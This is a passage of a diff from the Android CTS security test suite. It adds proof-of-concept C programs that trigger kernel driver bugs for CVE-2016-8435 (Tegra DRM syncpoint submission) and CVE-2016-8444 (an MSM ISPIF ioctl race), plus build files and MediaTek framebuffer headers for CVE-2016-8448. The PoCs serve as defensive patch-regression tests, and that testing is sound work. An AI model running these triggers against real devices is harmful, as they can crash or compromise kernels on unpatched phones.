+++ b/hostsidetests/security/securityPatch/CVE-2016-8435/local_pwn.h
@@ -0,0 +1,116 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#ifndef __local_pwn_H__
+#define __local_pwn_H__
+
+#define SIOCIWFIRSTPRIV 0x8BE0
+#define SIOCGIWNAME 0x8B01
+#define IOCTL_SET_STRUCT_FOR_EM (SIOCIWFIRSTPRIV + 11)
+#define PRIV_CUSTOM_BWCS_CMD 13
+#define PRIV_CMD_OID 15
+#define PRIV_CMD_SW_CTRL 20
+#define PRIV_CMD_WSC_PROBE_REQ 22
+
+enum host1x_class {
+ HOST1X_CLASS_HOST1X = 0x1,
+ HOST1X_CLASS_NVENC = 0x21,
+ HOST1X_CLASS_VI = 0x30,
+ HOST1X_CLASS_ISPA = 0x32,
+ HOST1X_CLASS_ISPB = 0x34,
+ HOST1X_CLASS_GR2D = 0x51,
+ HOST1X_CLASS_GR2D_SB = 0x52,
+ HOST1X_CLASS_VIC = 0x5D,
+ HOST1X_CLASS_GR3D = 0x60,
+ HOST1X_CLASS_NVJPG = 0xC0,
+ HOST1X_CLASS_NVDEC = 0xF0,
+};
+
+#define DRM_COMMAND_BASE 0x40
+#define DRM_COMMAND_END 0xA0
+
+#define DRM_TEGRA_OPEN_CHANNEL 0x05
+#define DRM_TEGRA_CLOSE_CHANNEL 0x06
+#define DRM_TEGRA_SUBMIT 0x08
+
+struct drm_tegra_open_channel {
+ __u32 client;
+ __u32 pad;
+ __u64 context;
+};
+
+struct drm_tegra_close_channel {
+ __u64 context;
+};
+
+struct drm_tegra_submit {
+ __u64 context;
+ __u32 num_syncpts;
+ __u32 num_cmdbufs;
+ __u32 num_relocs;
+ __u32 num_waitchks;
+ __u32 waitchk_mask;
+ __u32 timeout;
+ __u64 syncpts;
+ __u64 cmdbufs;
+ __u64 relocs;
+ __u64 waitchks;
+ __u32 fence; /* Return value */
+ __u32 reserved0;
+ __u64 fences;
+ __u32 reserved1[2]; /* future expansion */
+};
+
+#define DRM_IOCTL_BASE 'd'
+#define DRM_IOWR(nr,type) _IOWR(DRM_IOCTL_BASE,nr,type)
+#define DRM_IOCTL_TEGRA_OPEN_CHANNEL DRM_IOWR(DRM_COMMAND_BASE + DRM_TEGRA_OPEN_CHANNEL, struct drm_tegra_open_channel)
+#define DRM_IOCTL_TEGRA_CLOSE_CHANNEL DRM_IOWR(DRM_COMMAND_BASE + DRM_TEGRA_CLOSE_CHANNEL, struct drm_tegra_open_channel)
+#define DRM_IOCTL_TEGRA_SUBMIT DRM_IOWR(DRM_COMMAND_BASE + DRM_TEGRA_SUBMIT, struct drm_tegra_submit)
+
+struct drm_tegra_syncpt {
+ __u32 id;
+ __u32 incrs;
+};
+
+struct list_head {
+ struct list_head *next, *prev;
+};
+
+struct tegra_drm_client_ops {
+ void* open_channel;
+ void* close_channel;
+ void* reset;
+ void* is_add_reg;
+ void* submit;
+};
+
+struct tegra_drm_client {
+ /* sizeof(host1x_client) is 232 */
+ unsigned char pad[232]; /* maybe gadget arguments */
+ struct list_head list;
+ struct tegra_drm_client_ops *ops;
+};
+
+struct tegra_drm_context {
+ struct tegra_drm_client *client;
+ void *channel;
+ struct list_head list;
+ /* FIXME we need pass lock op */
+ //struct mutex lock;
+ //bool keepon;
+ //struct host1x_user user;
+};
+
+#endif
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8435/poc.c b/hostsidetests/security/securityPatch/CVE-2016-8435/poc.c
new file mode 100644
index 0000000..ff6acb0
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8435/poc.c
@@ -0,0 +1,74 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#define _GNU_SOURCE
+#include <string.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <sys/ioctl.h>
+#include <errno.h>
+#include <sys/stat.h>
+#include <fcntl.h>
+#include <sys/types.h>
+#include <unistd.h>
+#include <sys/syscall.h>
+
+#include "local_pwn.h"
+
+#define DEV "/dev/dri/renderD129"
+#define SYN_NUM 64
+
+struct drm_tegra_open_channel open_c = { 0 };
+struct drm_tegra_submit submit_c = { 0 };
+struct drm_tegra_syncpt syncpts[SYN_NUM] = { 0 };
+
+int main()
+{
+ int ret;
+ int dev_fd;
+ int i;
+
+ /* open dev */
+ dev_fd = open(DEV,O_RDONLY);
+ if(dev_fd == -1){
+ printf("[-] open dev failed %d %s\n", errno, strerror(errno));
+ return 0;
+ }
+
+ /* prepare for ioctl */
+ open_c.client = HOST1X_CLASS_VIC;
+ submit_c.num_syncpts = SYN_NUM;
+ submit_c.syncpts = (__u64)syncpts;
+
+ for(i = 1; i < SYN_NUM; i++){
+ syncpts[i].id = 192;
+ syncpts[i].incrs = 0xffff;
+ }
+
+ /* open channel */
+ ret = ioctl(dev_fd, DRM_IOCTL_TEGRA_OPEN_CHANNEL, &open_c);
+ if(ret == -1){
+ printf("[-] open_channel failed %d %s\n", errno, strerror(errno));
+ goto out_dev;
+ }
+ submit_c.context = open_c.context;
+ printf("[+] call submit\n");
+ ret = ioctl(dev_fd, DRM_IOCTL_TEGRA_SUBMIT, &submit_c);
+ printf("[+] submit return %d\n", ret);
+
+out_dev:
+ close(dev_fd);
+ return 0;
+}
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8444/Android.mk b/hostsidetests/security/securityPatch/CVE-2016-8444/Android.mk
new file mode 100644
index 0000000..50e2f6a
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8444/Android.mk
@@ -0,0 +1,35 @@
+# Copyright (C) 2016 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2016-8444
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+CFLAGS += -Wall -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8444/poc.c b/hostsidetests/security/securityPatch/CVE-2016-8444/poc.c
new file mode 100644
index 0000000..d681a43
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8444/poc.c
@@ -0,0 +1,78 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#define _GNU_SOURCE
+#include <unistd.h>
+#include <fcntl.h>
+#include <sys/syscall.h>
+#include <stdio.h>
+#include <string.h>
+#include <stdint.h>
+#include <pthread.h>
+
+#define MSM_SD_SHUTDOWN 0xc00856dd
+#define VIDIOC_MSM_ISPIF_CFG 0xc17056c0
+
+struct ispif_cfg_data {
+ int32_t cfg_type;
+ union {
+ int reg_dump; /* ISPIF_ENABLE_REG_DUMP */
+ uint32_t csid_version; /* ISPIF_INIT */
+ //struct msm_ispif_vfe_info vfe_info; /* ISPIF_SET_VFE_INFO */
+ //struct msm_ispif_param_data params; /* CFG, START, STOP */
+ };
+};
+
+long r[11];
+
+int fd;
+struct ispif_cfg_data data;
+
+void *worker_thread(void *arg) {
+
+ int arg1[3] = {0};
+ switch ((long)arg) {
+ case 0:
+ data.cfg_type = 8; ////release
+ ioctl(fd, VIDIOC_MSM_ISPIF_CFG, &data);
+ break;
+ case 1:
+ ioctl(fd, MSM_SD_SHUTDOWN, &arg1);
+ break;
+ }
+ return NULL;
+}
+
+int main() {
+
+ int pid,i;
+ pthread_t th[4];
+ fd = open( "/dev/v4l-subdev17", 0x0ul );
+
+ printf("please wait for several seconds...\n");
+
+ while(1){
+
+ data.cfg_type = 2; ////init
+ data.csid_version = 1;
+ ioctl(fd, VIDIOC_MSM_ISPIF_CFG, &data);
+
+ for (i = 0; i < 2; i++) {
+ pthread_create(&th[i], 0, worker_thread, (void *)(long)i);
+ usleep(10);
+ }
+ }
+ return 0;
+}
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8448/Android.mk b/hostsidetests/security/securityPatch/CVE-2016-8448/Android.mk
new file mode 100644
index 0000000..cd6049f
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8448/Android.mk
@@ -0,0 +1,35 @@
+# Copyright (C) 2016 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2016-8448
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+CFLAGS += -Wall -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8448/mtkfb.h b/hostsidetests/security/securityPatch/CVE-2016-8448/mtkfb.h
new file mode 100644
index 0000000..b33073c
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8448/mtkfb.h
@@ -0,0 +1,397 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#ifndef __MTKFB_H
+#define __MTKFB_H
+
+#include <linux/types.h>
+#include "mtkfb_info.h"
+
+
+/**NOTICE:
+ * Must be consistent with bionic/libc/kernel/linux/common/mtkfb.h
+ */
+#define MTK_FB_NO_ION_FD ((int)(~0U>>1))
+#define MTK_FB_NO_USE_LAEYR_ID ((int)(~0U>>1))
+#define FBCAPS_GENERIC_MASK (0x00000fff)
+#define FBCAPS_LCDC_MASK (0x00fff000)
+#define FBCAPS_PANEL_MASK (0xff000000)
+#define FBCAPS_MANUAL_UPDATE (0x00001000)
+#define FBCAPS_SET_BACKLIGHT (0x01000000)
+#define MTKFB_ERROR_IS_EARLY_SUSPEND (0x12000000)
+/* --------------------------------------------------------------------------- */
+/* IOCTL commands. */
+#define MTK_IOW(num, dtype) _IOW('O', num, dtype)
+#define MTK_IOR(num, dtype) _IOR('O', num, dtype)
+#define MTK_IOWR(num, dtype) _IOWR('O', num, dtype)
+#define MTK_IO(num) _IO('O', num)
+#define MTKFB_QUEUE_OVERLAY_CONFIG MTK_IOW(137, struct fb_overlay_config)
+/* -------------------------------------------------------------------------- */
+#define MTKFB_SET_OVERLAY_LAYER MTK_IOW(0, struct fb_overlay_layer)
+#define MTKFB_TRIG_OVERLAY_OUT MTK_IO(1)
+#define MTKFB_SET_VIDEO_LAYERS MTK_IOW(2, struct fb_overlay_layer)
+#define MTKFB_CAPTURE_FRAMEBUFFER MTK_IOW(3, unsigned long)
+#define MTKFB_CONFIG_IMMEDIATE_UPDATE MTK_IOW(4, unsigned long)
+#define MTKFB_SET_MULTIPLE_LAYERS MTK_IOW(5, struct fb_overlay_layer)
+#define MTKFB_REGISTER_OVERLAYBUFFER MTK_IOW(6, struct fb_overlay_buffer_info)
+#define MTKFB_UNREGISTER_OVERLAYBUFFER MTK_IOW(7, unsigned int)
+#define MTKFB_SET_ORIENTATION MTK_IOW(8, unsigned long)
+#define MTKFB_FBLAYER_ENABLE MTK_IOW(9, unsigned int)
+#define MTKFB_LOCK_FRONT_BUFFER MTK_IO(10)
+#define MTKFB_UNLOCK_FRONT_BUFFER MTK_IO(11)
+#define MTKFB_POWERON MTK_IO(12)
+#define MTKFB_POWEROFF MTK_IO(13)
+
+/* Fence/Ion, OVL decoupling */
+#define MTKFB_PREPARE_OVERLAY_BUFFER MTK_IOW(14, struct fb_overlay_buffer)
+
+/* S3D control */
+#define MTKFB_SET_COMPOSING3D MTK_IOW(15, unsigned long)
+#define MTKFB_SET_S3D_FTM MTK_IOW(16, unsigned long)
+
+/* FM De-sense for EM and Normal mode */
+#define MTKFB_GET_DEFAULT_UPDATESPEED MTK_IOR(17, unsigned long)
+#define MTKFB_GET_CURR_UPDATESPEED MTK_IOR(18, unsigned long)
+/* for EM, not called change writecycle because DPI change pll ckl */
+#define MTKFB_CHANGE_UPDATESPEED MTK_IOW(19, unsigned long)
+#define MTKFB_GET_INTERFACE_TYPE MTK_IOR(20, unsigned long) /* /0 DBI, 1 DPI, 2 MIPI */
+#define MTKFB_GET_POWERSTATE MTK_IOR(21, unsigned long) /* /0: power off 1: power on */
+#define MTKFB_GET_DISPLAY_IF_INFORMATION MTK_IOR(22, mtk_dispif_info_t)
+/*called before SET_OVERLAY each time, if true, hwc will not use FB_LAYER again*/
+#define MTKFB_AEE_LAYER_EXIST MTK_IOR(23, unsigned long)
+#define MTKFB_GET_OVERLAY_LAYER_INFO MTK_IOR(24, struct fb_overlay_layer_info)
+#define MTKFB_FACTORY_AUTO_TEST MTK_IOR(25, unsigned long)
+#define MTKFB_GET_FRAMEBUFFER_MVA MTK_IOR(26, unsigned int)
+#define MTKFB_SLT_AUTO_CAPTURE MTK_IOWR(27, struct fb_slt_catpure)
+
+/*error handling*/
+#define MTKFB_META_RESTORE_SCREEN MTK_IOW(101, unsigned long)
+#define MTKFB_ERROR_INDEX_UPDATE_TIMEOUT MTK_IO(103)
+#define MTKFB_ERROR_INDEX_UPDATE_TIMEOUT_AEE MTK_IO(104)
+
+/*restore bootlogo and character in meta mode*/
+#define MTKFB_META_SHOW_BOOTLOGO MTK_IO(105)
+
+/*Extension FB active option*/
+#define FB_ACTIVATE_NO_UPDATE 512 /* Skip frame update */
+/**
+ * Just for mt6589 Platform
+ * @{
+ */
+#define MTKFB_GETVFRAMEPHYSICAL MTK_IOW(41, unsigned long)
+#define MTKFB_WAIT_OVERLAY_READY MTK_IO(42)
+#define MTKFB_GET_OVERLAY_LAYER_COUNT MTK_IOR(43, unsigned long)
+#define MTKFB_GET_VIDEOLAYER_SIZE MTK_IOR(44, struct fb_overlay_layer)
+#define MTKFB_CAPTURE_VIDEOBUFFER MTK_IOW(45, unsigned long)
+
+/* -------------------------------------------------------------------------- */
+/* Video Playback Mode */
+#define MTKFB_TV_POST_VIDEO_BUFFER MTK_IOW(46, unsigned long)
+#define MTKFB_TV_LEAVE_VIDEO_PLAYBACK_MODE MTK_IOW(47, unsigned long)
+/* For Factory Mode */
+#define MTKFB_IS_TV_CABLE_PLUG_IN MTK_IOW(48, unsigned long)
+
+/* -------------------------------------------------------------------------- */
+#define MTKFB_BOOTANIMATION MTK_IO(49)
+#define MTKFB_GETFPS MTK_IOW(50, unsigned long)
+#define MTKFB_VSYNC MTK_IO(51)
+
+/* ----------------------------------------------------------------------FM De-sense for EM and Normal mode */
+#define MTKFB_FM_NOTIFY_FREQ MTK_IOW(52, unsigned long) /* for Normal mode */
+#define MTKFB_RESET_UPDATESPEED MTK_IO(53)
+#define MTKFB_SET_UI_LAYER_ALPHA MTK_IOW(54, unsigned long)
+#define MTKFB_SET_UI_LAYER_SRCKEY MTK_IOW(55, unsigned long)
+
+#define MTKFB_GET_MAX_DISPLAY_COUNT MTK_IOR(56, unsigned int)
+#define MTKFB_SET_FB_LAYER_SECURE MTK_IOW(57, int)
+/**
+ * @}
+ */
+/* ---------------------------------------------------------------------- */
+
+/* -------------------------------------------------------------------------- */
+
+typedef enum {
+ MTK_FB_ORIENTATION_0 = 0,
+ MTK_FB_ORIENTATION_90 = 1,
+ MTK_FB_ORIENTATION_180 = 2,
+ MTK_FB_ORIENTATION_270 = 3,
+} MTK_FB_ORIENTATION;
+
+
+typedef enum {
+ MTK_FB_TV_SYSTEM_NTSC = 0,
+ MTK_FB_TV_SYSTEM_PAL = 1,
+} MTK_FB_TV_SYSTEM;
+
+
+typedef enum {
+ MTK_FB_TV_FMT_RGB565 = 0,
+ MTK_FB_TV_FMT_YUV420_SEQ = 1,
+ MTK_FB_TV_FMT_UYUV422 = 2,
+ MTK_FB_TV_FMT_YUV420_BLK = 3,
+} MTK_FB_TV_SRC_FORMAT;
+
+typedef enum {
+ LAYER_NORMAL_BUFFER = 0,
+ LAYER_SECURE_BUFFER = 1,
+ LAYER_PROTECTED_BUFFER = 2,
+ LAYER_SECURE_BUFFER_WITH_ALIGN = 0x10001, /* the higher 16 bits =1 for adding 64 bytes alignment */
+} MTK_FB_OVL_LAYER_SECURE_MODE;
+
+typedef struct _disp_dfo_item {
+ char name[32];
+ int value;
+} disp_dfo_item_t;
+
+/* -------------------------------------------------------------------------- */
+struct fb_slt_catpure {
+ MTK_FB_FORMAT format;
+
+ volatile char *outputBuffer;
+ unsigned int wdma_width;
+ unsigned int wdma_height;
+};
+
+struct fb_scale {
+ unsigned int xscale, yscale;
+};
+
+struct fb_frame_offset {
+ unsigned int idx;
+ unsigned long offset;
+};
+
+struct fb_update_window {
+ unsigned int x, y;
+ unsigned int width, height;
+};
+
+typedef enum {
+ LAYER_2D = 0,
+ LAYER_3D_SBS_0 = 0x1,
+ LAYER_3D_SBS_90 = 0x2,
+ LAYER_3D_SBS_180 = 0x3,
+ LAYER_3D_SBS_270 = 0x4,
+ LAYER_3D_TAB_0 = 0x10,
+ LAYER_3D_TAB_90 = 0x20,
+ LAYER_3D_TAB_180 = 0x30,
+ LAYER_3D_TAB_270 = 0x40,
+} MTK_FB_LAYER_TYPE;
+
+typedef enum {
+ DISP_DIRECT_LINK_MODE,
+ DISP_DECOUPLE_MODE
+} MTK_DISP_MODE;
+struct fb_overlay_mode {
+ MTK_DISP_MODE mode;
+};
+
+typedef enum { /* map sessions to scenairos in kernel driver */
+ DISP_SESSION_LCM = 1 << 0, /* DSI0 */
+ DISP_SESSION_MEM = 1 << 1, /* OVL0->WDMA0 */
+/* Extension mode, Dst buf is provided by user,for Wifi Display or other purpose */
+ DISP_SESSION_WFD = 1 << 2,
+ DISP_SESSION_MHL = 1 << 3, /* DPI */
+ DISP_SESSION_LCM1 = 1 << 4, /* DSI1 */
+ DISP_SESSION_MEM1 = 1 << 5, /* OVL1->WDMA1 */
+ /* TODO:can be extended with other Session Id */
+ SESSION_MASK = 0xff & ~(1 << 6)
+} MTK_DISP_SESSION;
+
+struct fb_overlay_session {
+ unsigned int session; /* one or more @MTK_DISP_SESSION combined */
+};
+
+struct fb_overlay_decouple {
+ MTK_DISP_MODE mode;
+ unsigned int session;
+};
+struct fb_overlay_buffer {
+ /* Input */
+ int layer_id;
+ unsigned int layer_en;
+ int ion_fd;
+ unsigned int cache_sync;
+ /* Output */
+ unsigned int index;
+ int fence_fd;
+};
+
+struct fb_overlay_layer {
+ unsigned int layer_id;
+ unsigned int layer_enable;
+
+ void *src_base_addr;
+ void *src_phy_addr;
+ unsigned int src_direct_link;
+ MTK_FB_FORMAT src_fmt;
+ unsigned int src_use_color_key;
+ unsigned int src_color_key;
+ unsigned int src_pitch;
+ unsigned int src_offset_x, src_offset_y;
+ unsigned int src_width, src_height;
+
+ unsigned int tgt_offset_x, tgt_offset_y;
+ unsigned int tgt_width, tgt_height;
+ MTK_FB_ORIENTATION layer_rotation;
+ MTK_FB_LAYER_TYPE layer_type;
+ MTK_FB_ORIENTATION video_rotation;
+
+ unsigned int isTdshp; /* set to 1, will go through tdshp first, then layer blending, then to color */
+
+ int next_buff_idx;
+ int identity;
+ int connected_type;
+ unsigned int security;
+ unsigned int alpha_enable;
+ unsigned int alpha;
+ int fence_fd; /* 8135 */
+ int ion_fd; /* 8135 CL 2340210 */
+};
+
+struct fb_overlay_config {
+ int fence;
+ int time;
+ struct fb_overlay_layer layers[4];
+};
+
+struct fb_overlay_buffer_info {
+ unsigned int src_vir_addr;
+ unsigned int size;
+};
+
+struct fb_overlay_layer_info {
+ unsigned int layer_id;
+ unsigned int layer_enabled; /* TO BE DEL */
+ unsigned int curr_en;
+ unsigned int next_en;
+ unsigned int hw_en;
+ int curr_idx;
+ int next_idx;
+ int hw_idx;
+ int curr_identity;
+ int next_identity;
+ int hw_identity;
+ int curr_conn_type;
+ int next_conn_type;
+ int hw_conn_type;
+ MTK_FB_ORIENTATION layer_rotation;
+};
+/* -------------------------------------------------------------------------- */
+
+struct fb_post_video_buffer {
+ void *phy_addr;
+ void *vir_addr;
+ MTK_FB_TV_SRC_FORMAT format;
+ unsigned int width, height;
+};
+
+#if defined(CONFIG_ARCH_MT6735) || defined(CONFIG_ARCH_MT6735M) || defined(CONFIG_ARCH_MT6753)
+extern unsigned int EnableVSyncLog;
+
+void mtkfb_log_enable(int enable);
+int mtkfb_set_backlight_mode(unsigned int mode);
+int mtkfb_set_backlight_level(unsigned int level);
+int mtkfb_get_debug_state(char *stringbuf, int buf_len);
+unsigned int mtkfb_fm_auto_test(void);
+void mtkfb_clear_lcm(void);
+#endif /* CONFIG_ARCH_MT6735 */
+
+#ifdef __KERNEL__
+
+#include <linux/completion.h>
+#include <linux/interrupt.h>
+#include <linux/workqueue.h>
+#include <linux/version.h>
+#include <../drivers/staging/android/sw_sync.h>
+
+
+#define MTKFB_DRIVER "mtkfb"
+
+enum mtkfb_state {
+ MTKFB_DISABLED = 0,
+ MTKFB_SUSPENDED = 99,
+ MTKFB_ACTIVE = 100
+};
+
+typedef enum {
+ MTKFB_LAYER_ENABLE_DIRTY = (1 << 0),
+ MTKFB_LAYER_FORMAT_DIRTY = (1 << 1),
+ MTKFB_LAYER_SET_DIRTY = (1 << 2),
+} MTKFB_LAYER_CONFIG_DIRTY;
+
+typedef struct {
+ struct work_struct work;
+ struct list_head list;
+ struct fb_overlay_config config;
+ struct sync_fence *fences[4];
+ struct ion_handle *ion_handles[4];
+ void *dev;
+} update_ovls_work_t;
+
+struct mtkfb_device {
+ int state;
+ void *fb_va_base; /* MPU virtual address */
+ dma_addr_t fb_pa_base; /* Bus physical address */
+ unsigned long fb_size_in_byte;
+ void *ovl_va_base; /* MPU virtual address */
+ dma_addr_t ovl_pa_base; /* Bus physical address */
+ unsigned long ovl_size_in_byte;
+
+ unsigned long layer_enable;
+ MTK_FB_FORMAT *layer_format;
+ unsigned int layer_config_dirty;
+
+ int xscale, yscale, mirror; /* transformations.
+ rotate is stored in fb_info->var */
+ u32 pseudo_palette[17];
+
+ struct fb_info *fb_info; /* Linux fbdev framework data */
+ struct device *dev;
+
+ /* Android native fence support */
+ struct workqueue_struct *update_ovls_wq;
+ struct mutex timeline_lock;
+ struct sw_sync_timeline *timeline;
+ int timeline_max;
+ struct list_head pending_configs; /* CL2340210 */
+ struct ion_client *ion_client;
+};
+
+#endif /* __KERNEL__ */
+
+extern long hdmi_handle_cmd(unsigned int cmd, unsigned long arg);
+
+#if defined(CONFIG_ARCH_MT6797)
+extern unsigned int vramsize;
+#endif
+
+#if defined(CONFIG_ARCH_MT6735) || defined(CONFIG_ARCH_MT6735M) || defined(CONFIG_ARCH_MT6753)
+extern bool is_early_suspended;
+extern void mtkfb_waitVsync(void);
+extern bool is_ipoh_bootup;
+
+#ifdef CONFIG_OF
+int _parse_tag_videolfb(void);
+extern unsigned int islcmconnected;
+extern unsigned int vramsize;
+#else
+extern char *saved_command_line;
+#endif
+#endif /* CONFIG_ARCH_MT6735 */
+
+
+#endif /* __MTKFB_H */
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8448/mtkfb_info.h b/hostsidetests/security/securityPatch/CVE-2016-8448/mtkfb_info.h
new file mode 100644
index 0000000..61e7cfd
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8448/mtkfb_info.h
@@ -0,0 +1,101 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#ifndef __MTKFB_INFO_H__
+#define __MTKFB_INFO_H__
+
+#ifdef __cplusplus
+extern "C" {
+#endif
+
+
+ typedef enum {
+ DISPIF_TYPE_DBI = 0,
+ DISPIF_TYPE_DPI,
+ DISPIF_TYPE_DSI,
+ DISPIF_TYPE_DPI0,
+ DISPIF_TYPE_DPI1,
+ DISPIF_TYPE_DSI0,
+ DISPIF_TYPE_DSI1,
+ HDMI = 7,
+ HDMI_SMARTBOOK,
+ MHL,
+ DISPIF_TYPE_EPD,
+ SLIMPORT
+ } MTKFB_DISPIF_TYPE;
+
+ typedef enum {
+ MTKFB_DISPIF_PRIMARY_LCD = 0,
+ MTKFB_DISPIF_HDMI,
+ MTKFB_DISPIF_EPD,
+ MTKFB_MAX_DISPLAY_COUNT
+ } MTKFB_DISPIF_DEVICE_TYPE;
+
+ typedef enum {
+ DISPIF_FORMAT_RGB565 = 0,
+ DISPIF_FORMAT_RGB666,
+ DISPIF_FORMAT_RGB888
+ } MTKFB_DISPIF_FORMAT;
+
+
+ typedef enum {
+ DISPIF_MODE_VIDEO = 0,
+ DISPIF_MODE_COMMAND
+ } MTKFB_DISPIF_MODE;
+
+ typedef struct mtk_dispif_info {
+ unsigned int display_id;
+ unsigned int isHwVsyncAvailable;
+ MTKFB_DISPIF_TYPE displayType;
+ unsigned int displayWidth;
+ unsigned int displayHeight;
+ unsigned int displayFormat;
+ MTKFB_DISPIF_MODE displayMode;
+ unsigned int vsyncFPS;
+ unsigned int physicalWidth;
+ unsigned int physicalHeight;
+ unsigned int isConnected;
+/* this value is for DFO Multi-Resolution feature, which stores the original LCM Wdith */
+ unsigned int lcmOriginalWidth;
+/* this value is for DFO Multi-Resolution feature, which stores the original LCM Height */
+ unsigned int lcmOriginalHeight;
+ } mtk_dispif_info_t;
+
+#define MAKE_MTK_FB_FORMAT_ID(id, bpp) (((id) << 8) | (bpp))
+
+ typedef enum {
+ MTK_FB_FORMAT_UNKNOWN = 0,
+
+ MTK_FB_FORMAT_RGB565 = MAKE_MTK_FB_FORMAT_ID(1, 2),
+ MTK_FB_FORMAT_RGB888 = MAKE_MTK_FB_FORMAT_ID(2, 3),
+ MTK_FB_FORMAT_BGR888 = MAKE_MTK_FB_FORMAT_ID(3, 3),
+ MTK_FB_FORMAT_ARGB8888 = MAKE_MTK_FB_FORMAT_ID(4, 4),
